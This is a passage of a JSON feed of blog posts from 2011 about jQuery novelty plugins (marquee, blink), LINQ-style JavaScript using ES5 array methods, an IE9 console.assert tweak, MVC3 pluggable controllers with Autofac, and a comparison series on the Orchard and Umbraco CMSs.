run:\n$('h1').marquee({ speed: 5 }); Now it goes twice as fast!\nBringing sexy backwardsSo the next thing that’d be cool, let’s go from left to right, rather than right to left.\nFirst off we’ll add a new argument property, meaning we can do args like this:\n{ leftToRight: true } Here’s the updated plugin:\n$.fn.marquee = function(args) { var that = $(this); var textWidth = that.textWidth(), offset = that.width(), width = offset, css = { 'text-indent' : that.css('text-indent'), 'overflow' : that.css('overflow'), 'white-space' : that.css('white-space') }, marqueeCss = { 'text-indent' : width, 'overflow' : 'hidden', 'white-space' : 'nowrap' }, args = $.extend(true, { count: -1, speed: 1e1, leftToRight: false }, args), i = 0, stop = textWidth*-1; function go() { if(width == stop) { i++; if(i == args.count) { that.css(css); return; } if(args.leftToRight) { width = textWidth*-1; } else { width = offset; } } that.css('text-indent', width + 'px'); if(args.leftToRight) { width++; } else { width--; } setTimeout(go, args.speed); }; if(args.leftToRight) { width = textWidth*-1; width++; stop = offset; } else { width--; } that.css(marqueeCss); go(); }; Now what we need to do is change the start position, if we’re going left-to-right we’ll set the initial indent to be the negative width of the text. I’ve also done some refactoring which will have a preset value for the position we need to stop and reset from. By default this will be the negative width of the text when we’re going right to left. When we’re going left to right though we want it to be the full width of the content.\nAlso the width that we’re tracking either gets increased or decreased, depending what direction we’re going.\nSo we can go backwards like this:\n$('h1').marquee({ leftToRight: true }); Weeeeeeeeee!\nFinishing it off with $.DeferredWe looked at $.Deferred() as part of the <blink> tag implementation, so I wont cover it in great depth here, really all we have to do is quite simply, we create our $.Deferred() at the start of the plugin, return the promise at the end, and run resolve when the count is up.\nThere’s also a reject call to make sure that we can fail if the selector didn’t work.\nConclusionThis brings us to the conclusion of our fun into jQuery again and bringing back a good ol’ friend in the form of marquee.\nI’ve got a gist if you want the code and a jsfiddle if you want to play around with it.\nGo go gadget 1998 :D.\n", "id": "2011-02-09-marquee" }, { "title": "Implementing the blink tag using jQuery", "url": "https://www.aaron-powell.com/posts/2011-02-08-blink/", "date": "Tue, 08 Feb 2011 00:00:00 +0000", "tags": [ "jquery", "doing-it-wrong", "web", "javascript" ], "description": "How to implement the blink tag using jQuery and some silliness :P", "content": "Do you miss the good old days of of the web where you had the <blink> tag, oh it was wonderful.\nWell today I decided that I wanted to bring it back, damnit I want my text to blink!\nThanks to the wonders of jQuery this is a snap to build, in fact here it is:\n(function($) { $.fn.blinky = function() { var that = this; function go() { $(that).fadeOut().fadeIn(); setTimeout(go, 1e3); }; go(); }; })(jQuery); Now you can use it just like this:\n$('h1').blinky(); Woo, all your h1 elements are going to blink :D.\nBreaking it downTo make this work you need to run the code periodically, in my case I’m running it every 1000 milliseconds (1e3 is just a lazy way of doing it, exponents are fun!). You could do this with the setInterval method, but setInterval isn’t great, if your code is going to take longer than the allocated time it’ll start again, before the previous has finished!\nInstead I’m using the recursive setTimeout pattern, let’s look at that.\nRecursive setTimeout pattern This pattern is cropping up with some of the more popular frameworks, and the idea is that rather executing on a particular interval you execute when the code you want to run is completed.\nHere’s a better example:\nfunction doStuff() { $.get('/foo', function(result) { //do something with the result setTimeout(doStuff, 1e4); }; } As you can see we’re doing an AJAX get which may take a while to complete, and once it does complete we’ll do it again in 1000 milliseconds. If I’d been using a setInterval then there is the possibility of having two running at the same time, since the first hadn’t finished before the second started.\nSexing blink upSo now that we have a working <blink> simulator, let’s sex it up a bit. Why not make it so we can specify the speed at which it blinks at:\n(function($) { $.fn.blinky = function(frequency) { frequency = frequency || 1e3; var that = this; function go() { $(that).fadeOut().fadeIn(); setTimeout(go, frequency); }; go(); }; })(jQuery); Now you can optionally pass in a frequency you want to blink at:\n$('h1').blinky(2e3); Woo-hoo, delayed blink!\nHow about we extend it so that you can specify the number of times you want to blink:\n(function($) { $.fn.blinky = function(args) { var opts = { frequency: 1e3, count: -1 }; args = $.extend(true, opts, args); var i = 0; var that = this; function go() { if(i == args.count) return; i++; $(that).fadeOut().fadeIn(); setTimeout(go, args.frequency); }; go(); }; })(jQuery); I’ve also refactored to use an object literal as the arguments, using jQuery.extend, meaning you can do it like this:\n$('h1').blinky({ frequency : 2e3, count: 3 }); This will cause the h1 to blink 3 times over the course of 6 seconds, how pretty.\nMaking it REALLY sexy!I’m sure you’ve heard by now that jQuery 1.5 is out, and one of the new features of jQuery 1.5 is the Deferred object. Full API doco is here, but the short of it is that Deferred is how the new AJAX API works (I suggest you check out the jQuery doco for the best explanation of it), but one of the really cool things is that you can use Deferred in your own API, so that when your operations finish it can raise a done or fail method, depending on what is happening.\nSince we have the ability to specify a number of times to execute our blink will occur why not use Deferred to call a method when we’re done, seems like a good idea right.\nThere’s plenty of examples on the web of how to use Deferred, but here’s a basic example:\nfunction doStuff() { //create an instance of deferred var dfd = $.Deferred(); $.get('/foo', function(result) { //do stuff with result //success, so we tell the deferred object to resolve itself return dfd.resolve(); }); //return a promise to be deferred return dfd.promise(); } The high level workflow is:\nCreate a deferred object return a promise, to indicate that the deferred will complete at some point in the get method when it completes call the resolve method so anyone listening to the deferred will be run Now let’s add it to our blink method:\n(function($) { $.fn.blinky = function(args) { var opts = { frequency: 1e3, count: -1 }; args = $.extend(true, opts, args); var i = 0; var that = this; var dfd = $.Deferred(); function go() { if(that.length == 0) { return dfd.reject(); } if(i == args.count) { return dfd.resolve(); } i++; $(that).fadeOut().fadeIn(); setTimeout(go, args.frequency); }; go(); return dfd.promise(); }; })(jQuery); With deferred we can now do this:\n$('h1') .blink({ count: 2 }) .done(function() { $('h1').css('color', '#f00'); }); So once we’ve finished executing the two iterations the blink the h1 will turn red.\nWe’ve also got code in for a failure, if there was nothing found in our selector it’ll raise a failure method:\n$('foo') .blink({ count: 2 }) .fail(function() { console.log('aww snap!'); }); ConclusionJust like this we’ve come to the end of our post. This isn’t really a useful jQuery plugin, in fact <bink> was a terrible idea, it’s more a way that we can investigate a few interesting points, such as:\nrecursive setTimeout pattern for better control over delayed execution using Deferred to execute code once we’re done without passing the callback as an argument If anyone is interested the full code is available as a gist and I’ve created a playground on jsfiddle.\n", "id": "2011-02-08-blink" }, { "title": "LINQ in JavaScript, now with more ES5", "url": "https://www.aaron-powell.com/posts/2011-02-06-html5/", "date": "Sun, 06 Feb 2011 00:00:00 +0000", "tags": [ "javascript", "linq", "web", "linq-in-javascript" ], "description": "A look at the way ECMAScript 5 is improving LINQ in JavaScript", "content": "When I first wrote LINQ in JavaScript a few years ago it was just a thought experiment.\nSince then I’ve actually found that I want to use it, quite often in fact, and a lot of the reason I’ve been wanting this is because I’m lacking the ECMAScript 5 features which LINQ in JavaScript provides.\nECMAScript 5 quick primerA lot of people mistake many of the ECMAScript 5 (ES5) features for being HTML5, but it isn’t really, what we’re looking at here are the next features of JavaScript, and these are the map/filter methods.\nThese methods are similar to the kind of things you expect in functional programming languages, and how you can interact with arrays. The IE9 Test Drive actually has a good set of examples of using these new features.\nSo now that browsers are starting to come with built in methods like Array.prototype.map, which will transform the data into a new type or Array.prototype.filter, allowing us to conditionally remove items from the array, it’d make sense to actually use them.\nImproving LINQ in JavaScriptAs I said browsers are starting to ship with the new features on Array they are going to be a lot faster than anything written purely in JavaScript and residing in-browser.\nLet’s for example look at improving the Array.where method:\nArray.prototype.where = Array.prototype.filter || function (fn) { //implement a custom method } Here what we’re doing is executing the logic of:\nIf the Array.prototype.filter method exists assign it to Array.prototype.where If it doesn’t we’ll provide a custom method We can do the same thing with select and indexOf, using built-in methods from the Array.prototype chain.\nOther updatesWhile adding these updates I also decided to do some other performance tweaks:\nskip will now use Array.prototype.slice rather than iterating through the collection in JavaScript take also uses slice, but does a -1 multiplication so we go backwards through the collection groupBy has been cleaned up so there’s a few less lines of code in it select and where will pass in all the ES5 arguments when running in browsers that don’t support ES5 Feel free to check out the code from my bitbucket, and maybe some others than I will use it ;).\n", "id": "2011-02-06-html5" }, { "title": "Tweaking console.assert in IE9", "url": "https://www.aaron-powell.com/posts/2011-01-30-ie-9-console-assert/", "date": "Sun, 30 Jan 2011 00:00:00 +0000", "tags": [ "ie9", "javascript", "web" ], "description": "A small tweak to console.assert in IE9", "content": "Today while writing some JavaScript I was using the console.assert method to work out the state of things at different points in time.\nIf you’re not familiar with console.assert here’s the method signature:\nconsole.assert(expression, message[, object]) What this allows you to do is pass in an expression to be evaluated, a message to display when the expression is false and an optional object to dump.\nThis is really useful if you’re writing large chunks of JavaScript and you can’t/ don’t want to attach the debugger (common if you’re working with timeouts and intervals), you can have the application assertion results to the console to be observed.\nI was using this in Chrome and FireFox (since the machine I have at work only has XP so no IE9 :() and found it really useful to be able to log out the optional object.\nWhen doing so you end up with something like this:\nAs you can see you can inspect into the object that you dumped out. Sweet!\nSomething you may already be aware of is that IE9 also includes a console object (yay, no more alert debugging :P), and it also contains an implementation of console.assert. So I decided to test and see how it goes in IE9, and here’s what it looks like:\nOh dear, [object Object], where’s my object to inspect? This isn’t good now is it. The problem is that the IE9 console.assert method calls toString() on your object, resulting in the [object Object] output. It’s also right up against message.\nWell let’s fix it, the best thing about JavaScript is that you can just change stuff if you don’t like it. So here’s a method you can run in JavaScript to replace the out-of-the-box console.assert method:\n(function(assert) { console.assert = function(expression, message, object) { if(object) { //we only want to do this if they did provide an object assert(expression, message, ' >>> ' + JSON.stringify(object)); } else { assert(expression, message); } };\t})(console.assert); Here we’re creating an anonymous function that we’ll immediately execute, pass in the standard console.assert and then augment it with using JSON.stringify. The beauty of this is that the native method is still being called, but if you’re passing in an object we’re converting it to a JSON string first.\nNow when you do a console.assert and provide an object you get this:\nIt’s not perfect, you can’t inspect into the object since it’s just a string, but it does suite for a lot of purposes.\nJust don’t be silly and pass in jQuery as the object, you’ll end up with something quite large :P.\nDisclaimer: This was done against the IE9 Beta (build 9.0.7930.16406) so it may change by the time of official release.\nDisclaimer 2: Tested against the RC and it still doesn’t produce an object inspection so this work around is still handy.\n", "id": "2011-01-30-ie-9-console-assert" }, { "title": "Orchard & Umbraco - Managing Content", "url": "https://www.aaron-powell.com/posts/2011-01-27-managing-content/", "date": "Thu, 27 Jan 2011 00:00:00 +0000", "tags": [ "orchard", "umbraco" ], "description": "An overview of how to manage content in the two different CMSs", "content": "OverviewIn this article we’re going to continue our series in looking at the differences between Orchard and Umbraco. Today we’re going to be looking at managing content.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nFinding Content in OrchardWith Orchard you need use the navigation and go to the Content Items option:\nHere you’ll be presented with a screen which has all the items which you’ve created in your site:\nContent Item List\nThis is the source of all your needs, you can filter the list to the different content types, order them by different criteria or apply bulk actions.\nIn my article about Creating Content I pointed out that there wasn’t a way to open a page from the admin system, well I stand corrected, you can do it from the Content Items page. So I stand corrected, there is a way, but still kind of expected it to be from the editing screen.\nI also do quite like the way you can do bulk actions, you can unpublish, publish or delete pages. Very handy when you want to clean up a site instance, or deploy live.\nYou may also have noticed a green tick icon next to each content item, that indicates that it is published, alternately if you have unpublished content you get a nice red icon:\nFinding Content in UmbracoUnlike Orchard Umbraco uses a tree based structure for its content, and when you’re going to edit the content:\nFrom here you navigate to the particular content item that you want to edit and click on it.\nDepending on where the content is located it can actually be a little bit more tedious having to navigate down to the appropriate content item, but Umbraco kind of meets this issue in Juno with the new Dashboard. The new Dashboard has a Last Edited option which you can go to and then navigate to a content item:\nIt’s not quite as powerful as the Orchard content item filtering but it’s pretty handy, particularly in a Edit -> Review style workflow.\nSome of the options for Umbraco are a little bit more hidden than they are with Orchard, options such as Unpublish are on the Generic Properties tab, along with some of the meta data:\nThis is opposite to Orchard which had them up front when over viewing the content items.\nLike Orchard Umbraco does have a visual indicator as to whether a content item is published or unpublished. With Umbraco unpublished content has a dimmed out tree icon. Also Umbraco has the notion of saving content, meaning that you can make a change and save it into the CMS without publishing it. This is very handy if your working in the Edit -> Review workflow, or if you want to start editing a page and come back to it later to finish. These saved changes are indicated in the tree by an asterisk on the content item:\nAlso with Umbraco most of these options are available off the context menu in the content tree, and this is where you’ll find the Delete option, which is a little bit more hidden than with Orchard.\nA really nice feature about deleting content in Umbraco is that it has the idea of a recycling bin. So far I haven’t come across this feature in Orchard (although I may not have found it yet), but what it means is that when you delete a piece of content it isn’t actually removed; instead it is moved into the recycling bin and removed from the published site. This is a really useful feature and I’ve had it save more than one of my clients asses as they “accidentally” remove a piece of content, like say their home page (yes, I’ve had client delete their home pages, even their entire sites, all by accident, although I’ve never worked out how you can do that accidentally…).\nConclusionAgain we’ve seen two different takes on how to perform a task with the two CMSs, with Orchard staying with it’s minimalistic but direct approach to managing content, and Umbraco being a lot more visual about what you’re wanting to achieve.\n", "id": "2011-01-27-managing-content" }, { "title": "Creating Controllers-as-plugins using MVC3", "url": "https://www.aaron-powell.com/posts/2011-01-25-controller-plugins-with-mvc3/", "date": "Tue, 25 Jan 2011 00:00:00 +0000", "tags": [ "mvc3", "autofac", "funnelweb" ], "description": "A look at how to make pluggable Controllers using MVC3", "content": "OverviewWhile working on the plugin engine for FunnelWeb we decided that we wanted to add the ability for people to create their own extnesions which are Controllers and routes. Seems like a pretty simple idea, and it makes it really easy to add external functionality into FunnelWeb at a Controller level without rolling your own instace.\nBut there’s a catch…\nSome backgroundWe’re using MVC3 for FunnelWeb, and part of MVC3 is this lovely new way to do Dependency Injection, the IDependencyResolver interface. We’re using Autofac in FunnelWeb and it’s latest release (2.4) has MVC3 and IDependencyResolver support.\nThe main role of the IDependencyResolver is so that you can do Dependency Injection without having to reimplement a lot of the MVC core. Previously you had to create custom Controller Factories, and a bunch of other stuff (depending what you wanted to DI), but not any more!\nImplementing Dependency ResolverSo this is actually really simple to use, all you need to do to use your own custom resolver is this:\nvar builder = new ContainerBulder(); builder.RegisterControllers(Assembly.GetExecutingAssembly()); // do other registrations var container = builder.Build(); DependencyResolver.SetResolver(new AutofacDependencyResolver(container)); That’s all you have to do, and now any Controller which you’ve registered will be resolved via Autofac, not Activator.CreateInstance, meaning you don’t have to have a default constructor.\nBut there’s a problem, how do you add the Controllers which are not in the current assembly, to Autofac and to be resolved?\nExtending the plugin frameworkWell to add the new Controller-based extension point I set about expanding how our plugins worked. Previously we had a IFunnelWebExtension interface which you implemented, and it has a single method that initialized it.\nThat was fine for what we originally wanted, but how were we going to register new routes?\nEnter the RoutableFunnelWebExtension.\nTo do this I’ve created a new abstract class, RoutableFunnelWebExtension and it has some additional information on it, first off it has the RouteCollection so you can register routes, but it also has a method which will resolve Controllers for you. But don’t worry, we’ve done the heavy lifting and you don’t need to register them yourself, we handle it for you :).\nSo we have this method:\nprotected internal virtual void RegisterControllers(ContainerBuilder builder) { builder.RegisterControllers(GetType().Assembly) ; } Cool, that’ll handle our registrations, let’s assume we have a route setup up, our extension is in /bin/Extensions, and we’re good to go right… right?\nWrong.\nThis is the point I got to where I started pulling out my hair, when I’d hit the route I configured it resulted in a 404. This is quite strange, FunnelWeb has a catch all route, so that you can create any page URL you want, so a 404 really isn’t possible.\nAfter some digging it turns out that the route was being hit, and this was why the 404 was happening, the route was matching, but no Controller was being resolved. But hang on though, our plugin has registered the Controller right? If I inspect the container then yeah, I can see it, so why was it not found?\nUnderstanding how Controllers are found So as it turns out the IDependencyResolver isn’t actually the silver bullet which I was expecting it to be, it turns out that the pesky BuildManager is back to spoil my fun.\nSide note, Shannon Deminick has also blogged about plugin engines and the problems which the BuildManager can produce.\nWhen a route is found MVC goes to the IControllerFactory and asks it to create the Controller instance. Out of the box this heads over to the DefaultControllerFactory class, and it eventually goes out to your IDependencyResolver to find it. The catch is, MVC first finds the type of the Controller whihc matches the route. This is handled by the GetControllerType method, and this is where we’re hitting a problem.\nIn the default instance this will look into the BuildManager and find out what the type is. Now that’s generally fine, provided your Controller is in the /bin folder, but the Controller isn’t in there, our extensions are in /bin/Extensions, and the BuildManager isn’t smart enough to look there. This means that when the Controller type tries to be found it returns null, and in turn MVC assumes that these are not the Controllers you are looking for.\nCrap.\nAs it turns out the default Controller Factory isn’t smart enough to look into the DI container (and well that’s expected, it’s kind of a rough requirement to force on the DI container), so it looks like we have to implement our own anyway.\nLuckily we don’t need to do a full Controller Factory, we can just extend the default one. What you want to do is extend the GetControllerType method to also go to the DI container.\nTo be able to efficiently locate our Controller type I first want to make it better described in Autofac, so I’ll augment our RegisterControllers method in the plugin framework:\nprotected internal virtual void RegisterControllers(ContainerBuilder builder) { builder.RegisterControllers(GetType().Assembly) .Named<IController>(t => t.Name.Replace("Controller", string.Empty)) ; } Now our Controllers are Named registrations, and we can find them by their Controller name:\npublic class FunnelWebControllerFactory : DefaultControllerFactory { private readonly IContainer _container; public FunnelWebControllerFactory(IContainer container) { _container = container; } protected override Type GetControllerType(RequestContext requestContext, string ControllerName) { var Controller = base.GetControllerType(requestContext, ControllerName); if (Controller == null) { object x; if (_container.TryResolveNamed(ControllerName, typeof(IController), out x)) Controller = x.GetType(); } return Controller; } } As you can see here we’re overriding the GetControllerType method. If the base implementation doesn’t return a Controller, which it wont if a) the Controller isn’t in the BuildManager or b) if you’re not routing to a Controller, we’ll see if Autofac knows about it.\nIf Autofac did know about it then we can return the type of it and we’re going to be right now… right?\nSigh.\nSo my Controller plugin has a constructor argument which I need to be injected, but I’m seeing a lovely YSOD saying that Activator.CreateInstance is unable to create the Controller as there is no default constructor (a constructor with no arguments). Wait, what? Isn’t the IDependencyResolver meant to be resolving it?\nWell yes, but there’s still a problem, once GetControllerType is called the returned type is passed into our IDependencyResolver.GetService method, and Autofac will resolve it, or return null if it can’t find it, and when null is returned the Controller Factory will fall back to Activator.CreateInstance.\nThe reason that the type isn’t found is because the Controller isn’t registered using the type of the Controller, so it can’t be found in Autofac. Well that’s a very easy one to fix, we’ll just ensure that the registration is registered by it’s type too:\nprotected internal virtual void RegisterControllers(ContainerBuilder builder) { builder.RegisterControllers(GetType().Assembly) .Named<IController>(t => t.Name.Replace("Controller", string.Empty)) .AsSelf() ; } Now we’re registering the types as their actual type, and now we can resolve it from Autofac using that. And you know what, hitting the route now calls the Controller action correctly.\nConclusionWhich MVC3 is yet aother good step towards simple extensibility there’s a few pain points when you’re wanting to do stuff that is edge case. And yet again the major pain point which we’re coming across is the BuildManager.\nBut with a few code tweaks and a custom Controller Factory you too can load a Controller from a folder that isn’t /bin/.\nI hope in future versions of ASP.Net the BuildManager can be made a bit smarter, and work better with types outside /bin.\nIf you’re looking for an alternate way to do plugins I suggest you check out Shannon’s posts.\n", "id": "2011-01-25-controller-plugins-with-mvc3" }, { "title": "Umbraco, Razor and MIX11", "url": "https://www.aaron-powell.com/posts/2011-01-24-mix11/", "date": "Mon, 24 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "razor", "mix11" ], "description": "Help me get a session at MIX11 ;)", "content": "Just a quick heads up, today I got word that my session which I submitted to MIX, Razor and Umbraco, has got through to open call!\nI’ve previously blogged about using Razor with Umbraco, but if you’d like to see a more in-depth talk, and also a look at how you can use MVC3 with Umbraco today, be sure to vote.\nRegardless of whether I get accepted or not I’ll be at MIX11, so if you’re also there feel free to find me and say hi :).\n", "id": "2011-01-24-mix11" }, { "title": "Unit Testing with Umbraco - Video", "url": "https://www.aaron-powell.com/posts/2011-01-20-video/", "date": "Thu, 20 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "unit-testing-with-umbraco" ], "description": "Video of my Unit Testing with Umbraco session from CG10", "content": "It’s possibly old news but I only just found out today, the recording of my Unit Testing with Umbraco session from CodeGarden 10 is available online for viewing.\nApparently the audio isn’t great, but I’m sure you can get the gist of it ;).\nThe video is available here, and while you’re at it check out the other CodeGarden 10 session videos.\n", "id": "2011-01-20-video" }, { "title": "How to get the field name for a model property", "url": "https://www.aaron-powell.com/posts/2011-01-19-find-name-from-field/", "date": "Wed, 19 Jan 2011 00:00:00 +0000", "tags": [ "asp.net", "mvc", "web" ], "description": "Ever needed to find the name that'll be generated for a property in MVC? Here's how", "content": "I’m working on a custom EditorTemplate for a FunnelWeb around the new tagging system that I’m working on.\nIt’s quite a complex editor that I’m doing, and it’s being bound against a collection, an IEnumerable<T> in fact. But I have a problem, I need to be able to find out the Name that would be generated for the model property.\nIf you do something like:\n@Html.EditorFor(x => x.StringProperty) You will get an input like this:\n<input type="text" name="StringProperty" /> But I need the Name, how do you do it?\nThe other week when I was browsing through the Orchard source I came across this gem, and I knew one day I was going to need to do it, but you can get it from the ViewData of the HtmlHelper instance, just like this:\n@Html.ViewData.TemplateInfo.GetFullHtmlFieldName(string partialFieldName) Here’s the MSDN doco if you’re interested in reading it. But that’s not really useful, you need to pass a string in, that’s not really useful, I’ve got a Model property to work with, well you can nicely convert a Lambda expression, using the ExpressionHelper class (link).\nHere’s an extension method which will do what I need:\npublic static string FieldNameFor<T, TResult>(this HtmlHelper<T> html, Expression<Func<T, TResult>> expression) { return html.ViewData.TemplateInfo.GetFullHtmlFieldName(ExpressionHelper.GetExpressionText(expression)); } I got the source from the Orchard project, you can find it here.\nNow you can easily get the Name for any property.\n", "id": "2011-01-19-find-name-from-field" }, { "title": "Orchard & Umbraco - Creating Content", "url": "https://www.aaron-powell.com/posts/2011-01-16-creating-content/", "date": "Sun, 16 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "orchard" ], "description": "In this article we'll look at the difference between the two systems when it comes to creating content.", "content": "OverviewIn this article we’re going to continue our series in looking at the differences between Orchard and Umbraco. Today we’re going to be looking at creating content.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nCreating content in OrchardAs I mentioned in my last post about admin systema I pointed out that the first most option in the navigation is for creating content, and here we’re going to go through the workflow of creating content. First off we’ll create a new page\nSo this will create a new piece of content using the Content Type of Page, which then takes us to the following editing screen:\nThis is a full list of all the properties which I can edit for this page, I can put in a title, I can set the URL (which is auto-generated from the page title by stripping spaces and other special characters). Theres then a nice big text editor which uses TinyMCE as the WYSIWYG editor. Lastly there’s an option to set the tags for the page, and finally some options regarding to publish.\nI can’t really fault it, the only thing that confuses me is the Tags option, I’m not exactly sure why I would want this on just any page, but yes, you can remove.\nI’d say that it’s because I’ve spoiled by Umbraco as when you create links (or add media) using the Orchard version of TinyMCE you have to enter the URLs yourself. This is a bit of an annoyance when you don’t know the paths of what you want to link to directly. I also am not sure what impact this would have when you modify URLs, I haven’t dug into that, but I’d expect that it’d cause links to break.\nBut that said I actually quite like the ability to full-screen the TinyMCE instance, this is really good if you’re working with large content blocks.\nOnce finished I click save and unsurprisingly my new page 404’s:\nSomething I noticed when trying to navigate to this page I noticed that there wasn’t any link on the create page, I’m not sure if I’m just blind or it’s actually not there. Personally I think this would be really useful, it makes it easy to get to your new page.\nAlso, I can’t see to find any kind of preview function in Orchard pages.\nLet’s go back and publish a page, you can publish the page right now or set up a scheduled publish of the content. I’m going to publish it now as that’s what I want done, and now our page is live!\nSo I chose to have this page added to the navigation, put some basic information in and that is how it looks. Obviously the Tags seems a bit silly, but if you remove them nothing around it will be displayed for it.\nAnd that’s it, we’ve built a page in Orchard!\nCreating content in UmbracoWith Umbraco there is two ways which you can create new content, there’s a link in the upper left, or you can do it from the context menu of the tree:\nI’ll admit that I’ve never used the upper left create button, I’ve always found it makes a lot more sense to create it in place from the content tree, so what’s what I’m doing. Choosing create will then give you a new dialog, allowing you to enter the page title and select the page type:\nThis is a bit more of an involved process than Orchard, but it does have a purpose. In my admin system post I mentioned that Umbraco seems to have more of a concept of hierarchy in the pages, and this dialog is used to place restrictions on what Document Types can be placed where in the site structure. I see this as a really useful feature, it allows you to create very special site layouts by putting restrictions around your content editors without their knowledge.\nOnce you have a new page you’ll see that there’s a difference between Orchard and Umbraco again. Unlike Orchards full view of what is going able to be edited Umbraco uses a tabbed UI:\nI can’t decide what I prefer, the Umbraco or the Orchard UI, both have pros and cons, and both make sense in the context of their parent UI. It’s up to you to decide which is your preference.\nUmbraco also uses the TinyMCE editor, but it’s a slightly customized version of it. With Umbraco the media and link dialogs allow you to interact with the CMS and select existing pages or media items which have been uploaded in the system, you don’t have to remember the URLs.\nOnce I’ve populated all my content I then save the page and then I want to view it, like I did in Orchard. Unlike Orchard Umbraco has a preview feature (and if you’ve worked with older version of Umbraco there is a limit with the preview engine and XSLT, but that’s fully resolved now):\nThis gives a view of the page, with a not-so-friendly URL (it’s the ID of the page), and a nice banner to indicate that it’s in preview mode:\nSweet, I can view my content before going live, and this is a really useful feature, content editors like being able to see what their new page will look like without it going live.\nOnce you save and publish you’ll be able to navigate to the full URL as well. The URL is on the General Properties tab as well, so you can click on it and navigate straight to the page. Again a small feature but it’s really handy.\nConclusionTo wrap up we’ve looked at what it’s like to create a page in each system. Umbraco is a bit more involved a process, and it gives you a lot of flexibility-by-restrictions, where as Orchard is less restricted about what it allows you to do.\nThere’s a few small things about Orchard I didn’t like, the lack of easy way to open a page from the edit screen, and the missing preview feature (or at least, I didn’t find it!). But keep in mind Orchard is only v1, I expect that preview would come in future versions, so keep an eye out for it.\n", "id": "2011-01-16-creating-content" }, { "title": "Orchard & Umbraco - The Admin", "url": "https://www.aaron-powell.com/posts/2011-01-15-admin/", "date": "Sat, 15 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "orchard" ], "description": "A look at the admin systems for Orchard and Umbraco", "content": "OverviewIn this article I’m going to have a look at the admin systems for the two CMSs. You can consider this a ‘first look’ although in reality this isn’t my first look at either admin systems I’ll do my best to pretend ;).\nFirst off let me say that there is a good overview of the Orchard admin on their website, and this post isn’t to try and replace it or anything, it’s more my opinion of it.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nThe Orchard AdminTo get into the Orchard admin you log into /admin and put in the details from your setup process, when logging in you see something like this:\nTo me this look pretty slick, I really like the look of it, it’s very current web, and I like it. Also there’s a nice friendly message welcoming you to Orchard, which I find to be a nice touch.\nFunctionality wise your primary point of call is the navigation bar:\nThis is quite different to the navigation system of Umbraco (which I’ll come to shortly), its a text-based navigation, which isn’t as unintuitive as you’re initially think. I say this because I’m a visual person so I find graphical navigations quick to pick up.\nBut that said Orchard has some nice features that make it very intuitive. First off the top most item of the navigation is the point you’ll be looking for most of the time, a new page link.\nWith a few clicks you can easily hide off pieces you don’t require at the current point in time (the arrow next to the section headings). This makes the Orchard admin something very simple and straight to the point of what you’re trying to do, manage a site.\nWhat I Like As I’ve said I quite like the UX experience of the Orchard admin, I find it quite ascetically pleasing.\nI like the way that Orchard has you create content, that underneath the New option it lists out the types which you can create.\nLastly I like the way Orchard provides a direct link back to your Orchard website. It may be a small feature, but it’s surprisingly useful a feature.\nThe Umbraco back-officeWith Umbraco its administration system is most commonly referred to as the back-office, and is accessible via /umbraco/ (previously that would redirect to a page which launched a popup, but that was removed in v4.5). If you’ve seen the Umbraco in the past (say before Juno) then you’ll know that it can be a bit daunting, upon logging in you were often presented with a very play looking interface. Well luckily with Juno it’s been updated nicely and this is what the Juno default back office looks like:\nAlready you can see the primary difference between the two systems, Umbraco has much more of a direct focus on content management.\nAnother major difference is the tree down the left hand side. This is to do with the fact that Umbraco has much more of a hierarchical content focus than Orchard.\nFor navigating around the back office Umbraco has sections:\nThe difference sections load up different contextual information, but in the same UX as posted above. Because the sections are hidden behind a full UI refresh, meaning that if you’re not exactly sure what you’re looking for you can perform a few wrong clicks (been there, done that :P).\nWhat I like Putting on my content editors hat I do like the fact that Umbraco defaults to loading me into the content editing section of the back office; it’s my primary focus at that time so saving me digging around is a benefit for sure.\nAnother thing that I like about Umbraco, which I didn’t come across in Orchard, is the auto-locking feature. This is a new feature in Juno (and replaces the keepalive.aspx file which caught me off guard more than once), and it works like this:\nIn this instance I haven’t interacted with Umbraco for a few minutes (a time period which is set in the web.config in <add key="umbracoTimeOutInMinutes" value="20" />). Umbraco will then count down to zero and once you get there you’ll get this:\nNow Umbraco can’t be interacted with until you log in again. From the point of view of a content editor I can see the auto-locking feature to be very handy, especially if you’re in an organisation which security is really a concern.\nConclusionIn this article we’ve had a very quick look at the admin systems of both Orchard and Umbraco. This article wasn’t intended to be a deep look into the admin systems, nor was it to look into features which make up the system, it was more a first impressions article.\n", "id": "2011-01-15-admin" }, { "title": "Orchard & Umbraco - Introduction", "url": "https://www.aaron-powell.com/posts/2011-01-12-orchard-umbraco/", "date": "Wed, 12 Jan 2011 00:00:00 +0000", "tags": [ "orchard", "umbraco" ], "description": "An introduction to a series of looking at comparing Orchard CMS and Umbraco", "content": "OverviewIncase you haven’t heard Orchard CMS has hit version 1.0, and at pretty much the same time Umbraco Juno (4.6) also has been released. I think this is a great chance to do a bit of a comparison between the two products and hopefully provide people with some insight into both products.\nI’m going to only be looking into some very simple aspects of it, doing a 100% feature-by-feature comparison would be really time consuming and probably make for a boring blog post, but never the less, we’ll get cracking now.\nThis is being written from the point of view of an Umbraco core team member, that means that this may seem bias towards Umbraco but believe me I will do my best to be objective on all points throughout this comparison.\nArticlesHere is the list of articles in the series:\nInstall experience Admin Systems Creating content Managing Content ", "id": "2011-01-12-orchard-umbraco" }, { "title": "Orchard & Umbraco - The install experience", "url": "https://www.aaron-powell.com/posts/2011-01-11-orchard-umbraco-installing/", "date": "Tue, 11 Jan 2011 00:00:00 +0000", "tags": [ "orchard", "umbraco" ], "description": "A comparison between the install experience between Orchard CMS and Umbraco Juno", "content": "OverviewIn this article I’m going to be looking at the install experience of Orchard and Umbraco and what are the differences between the two.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nThe Install ExperienceFor this article I’ve gone out and grabed the Orchard 1.0 release and Umbraco 4.6.1 release (Web Deploy version), and the first thing I noticed is that they are basically the same in terms of download size, with Orchard being slightly smaller, it’s 7.08Mb where as Umbraco is 7.50Mb. This is nice, both are sub 10Mb (by a long way), and something I wouldn’t have a problem storing in a source control system.\nI’m going to use IIS Web Deploy for both installs, this way we’re playing on a equal footing from the get go. I could have use the Microsoft Web Platform Installer (Web PI) for it, but at the time of writing the Umbraco instance in Web PI I found to be 4.5.2, which is not the latest stable (Note: Since writing this post Umbraco Juno 4.6.1 is now available in Web PI). 